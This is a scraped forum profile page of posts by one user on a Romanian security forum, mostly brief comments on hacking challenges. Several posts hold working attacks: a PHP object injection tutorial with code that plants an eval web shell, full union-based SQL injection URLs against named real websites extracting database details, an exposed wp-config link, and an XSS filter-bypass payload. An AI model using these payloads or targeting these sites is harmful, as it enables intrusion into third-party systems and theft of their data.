-
Posts
981 -
Joined
-
Last visited
-
Days Won
20
Everything posted by dancezar
-
[PHP]Un fel de RST Pentesting Academy [for noobies]
dancezar replied to tudor13mn13's topic in Programare
Sql injection fara cerere SQL ... -
Ereticule fi gata sa-ti primesti cipul!
-
Misto challenge , MS:D
-
Acelasi terminatie adica? 123 si 223 au acelasi terminatie? Poti sa imi dai un exemplu? MS:)
-
Ok poti sa ne dai un alert(document.domain) ms:)
-
Serios tu chiar vinzi gaini pe un forum de securitate IT ? Daca e serios si nu trolling , imi cer scuze si spor la vanzare:)
-
http://s17.postimg.org/8xp6ui8ym/image.jpg GG //Adica eu nu am executat un alert adevarat?
-
XSS game — un mic challenge oferit de Google
dancezar replied to B7ackAnge7z's topic in Challenges (CTF)
Bravo desteptule , bine ca esti tu destept si nu ii lasi si pe alti sa il rezolve . Cica "L-am terminat eu..." l-ai terminat si tu , vrei sa spui. //edit fail a folosit acelasi vectori ca aici http://hacktracking.blogspot.de/2014/05/xss-game-area.html -
Da cea ce am aratat este numai codul si ar functiona decat local cea ce se face in urma executiei va fi o clasa incompleta , multumesc pentru completare ideia era sa se inteleaga procesul.
-
XSS game — un mic challenge oferit de Google
dancezar replied to B7ackAnge7z's topic in Challenges (CTF)
http://s24.postimg.org/hvjdgzr0z/xss.png Nice ma asteptam la ceva mai greu, dar au fost interesante. Unele cred ca au fost inspirate din cele care au fost gasite la ei //la 6 nici nu a fost nevoie sa execut xss din fisier extern -
http://www.fas.harvard.edu/~cafrica/wp-config.php "www.jpl.nasa.gov deci ca sa ma intelegeti pe asta l-am spart eu" Am vrut sa o spun in https://rstforums.com/forum/85196-arc-nasa-gov-xss-found.rst#post547892
-
PHP Object injection Php object injection este o vulnerabilitate de tip RCE care este cauzata de folosirea necorespunzatoare a functiei serialize si unserialize din php.Aceasta functie serielize este folosita deobicei pentru pastrarea unui array intr-un string, spre exemplu daca aveti un array cu ultimele pagini accesate de utilizator si vreti sa le pastrati intr-un cookie ca apoi sa puteti sa folositi cookie-ul pe post de array puteti folosi aceste doua functii. Problema este ca se pote face serielize si pe classe iar atacatorul poate face o clasa prin care poate apela functia _contruct si sa execute cod php. Un exemplu de cod vulnerabil este acesta: <?php $d=unserialize(urldecode($_GET['a'])); ?> Cum vom putea exploata aceasta linie de cod in avantajul nostru ? Simplu vom incerca sa facem serielize la o clasa astfel cand vom introduce stringu serializat in ?a= in $d se v-a crea noua noatra clasa si se v-a executa codul nostru malitios. Rulam urmatorul cod: <?php class inj{ function inj($fil){ file_put_contents($fil,'<?php eval($_GET["a"]); ?>'); } } echo urlencode(serialize(new inj('SHELL.php'))); ?> In urma rularii codului de mai sus veti obtine payloadul: O%3A3%3A%22inj%22%3A0%3A%7B%7D Iar daca intrduceti acel payload in codul vulnerabil : site.com/phpobj.php?a=O%3A3%3A%22inj%22%3A0%3A%7B%7D se v-a crea fisierul c.php pe serverul victimei. Parametri vulnerabili sub care poate aparea vulnerabilitatea pot fi : $_COOKIE $_POST $_SERVER $_GET $_REQUEST Petru a evita aceasta vulnerabitate evitati folosirea acestor functii sau sa le inlocuiti cu json_encode in loc de serialize si json_decode in loc de unserialize O astfel de vulnerabilitate a fost reparata in vbulletin 4.2.2 Security Exploit Patched on vBulletin – PHP Object Injection | Sucuri Blog
-
Observasem dupa ce am postat:)
-
http://valasztas2014.jobbik.hu/videok.php?id=64 and 0 union select 1,@@version,3,4,5,6,7%23 http://valasztas2014.jobbik.hu/admin
-
Single RCE Vulnerability that affects Microsoft, Yahoo and Orange
dancezar replied to Rikudo's topic in Stiri securitate
RCE Remote Code Execution : executi cod albitrar Ce e acolo e mai mult Albitrary file upload numai ca nu este trimis requestul prin POST ci prin GET -
Ajutor Matrice Nepatratica Simetrie fata de linie sau coloana
dancezar replied to Teteus's topic in Programare
hank12: #include<iostream> using namespace std; int matrice[10][10],n,m; int simetric_linie(int linie){ for(int i=0;i<n;i++) if(matrice[linie-1][i]!=matrice[linie+1][i]) return 0; return 1; } int main(){ int linie; cin>>n>>m>>linie; //citesti matricea if(simetric_linie(linie-1)) //daca incepi cu indici de la 0 cout<<"Simetric fata de linia "<<linie; else cout<<"Nu"; return 0; } Nu l-am testat ca nu am compilator la mine dar l-am testat in php si a mers. Si asa faci si la coloane numai ca schimbi notatiile in loc de matrice[linie-1] inversezi ee6354ac6a907b9e3a4895873fd9707cX -
Ajutor Matrice Nepatratica Simetrie fata de linie sau coloana
dancezar replied to Teteus's topic in Programare
daca am inteles bine ,dupa exemplul lui alex de mai sus este simetric fata de linia 2 spre exemplu? -
De unde pizda masi a ajuns ala la voi? @Kalashnikov. puteai macar sa ma anunti ca vrei sa il folosesti , totusi astept sa aflu unde l-ai gasit si cine ti l-a dat ca sa stiu cu cine mai fac sharing de acum in colo. //Cred ca e o versiune mai veche cea mai noua este postata la VIP
-
Closed Felicitari celor care au reusit sa il rezolve! In primul rand este de tip String Bellman & Flint - Product Details Bellman & Flint - Product Details Numaratul coloanelor se face exact ca la Mysql http://www.bellmanandflint.co.uk/product_details.aspx?product_id=1900%27 order by 1-- Si in total sunt 9 coloane apoi ca sa treceti de eroarea "Unable to cast object of type 'System.Int32' to type 'System.String'." care apare mai jos http://www.bellmanandflint.co.uk/product_details.aspx?product_id=1900%27 union select 1,2,3,4,5,6,7,8,9-- Trebuie sa transformam coloanele in string pentru ca sunt numere.... http://www.bellmanandflint.co.uk/product_details.aspx?product_id=1900%27 union select '1','2','3','4','5','6','7','8','9'-- Pentru a extrage versiunea si Nick-ul vostru spre exemplu folosim + intre expresii http://www.bellmanandflint.co.uk/product_details.aspx?product_id=1900%27%20union%20select%20%271%27,%272%27,@@version%2b%27:salut%27,%274%27,%275%27,%276%27,%277%27,%278%27,%279%27-- In final asta e sintaxa : http://www.bellmanandflint.co.uk/product_details.aspx?product_id=1900%27%20union%20select%20%271%27,%272%27,%27Nick:danyweb09%27%2bchar%2860%29%2bchar%2898%29%2bchar%28114%29%2bchar%2862%29%2b%27Version:%27%2b@@version%2bchar%2860%29%2bchar%2898%29%2bchar%28114%29%2bchar%2862%29%2b%27First%20database:%27%2bdb_name%280%29,%274%27,%275%27,%276%27,%277%27,%278%27,%279%27--
-
Good job! esti cel mai bun frate , felicitari ma intreb cum ai reusit?</scarcasm>
-
MSSQL ,union basedu pe care il stie toata lumea cu un mic trick la partea de tip de date(INT/STRING) . Eroarea spune totul Unable to cast object of type 'System.Int32' to type 'System.String'. Programatori stiu ce inseamna asta;)
-
CLOSED Orice pm primit nu se v-a mai lua in considerare. Rezolvarea era foarte simpla! Am dat hintu intr-un post mai sus ••••••>GetMeOnTop Search for organic search engine ranking Daca bagati " este eliminat(Inlocuit cu NULL) ,va puteti folosi de el ca faceti bypass la xss auditor. Practic daca introduceti <scri"pt> filtrul v-a elimina " si v-a deveni <script>. ••••••>GetMeOnTop Search for organic search engine ranking<scri"pt>alert(1)</script> Si astfel v-a functiona pe ambele browsere!@
-
Target: xxx.bellmanandflint.co.uk/product_details.aspx?product_id=1900 Cerinte : - Folositi doar Union Based NU ERROR BASED NU STACKED QUERY - Scoateti versiunea impreuna cu nickul vostru ,baza de date principala si username-ul - Trimiteti prin pm sintaxa Solveri: -denjacker -askwrite -BitMap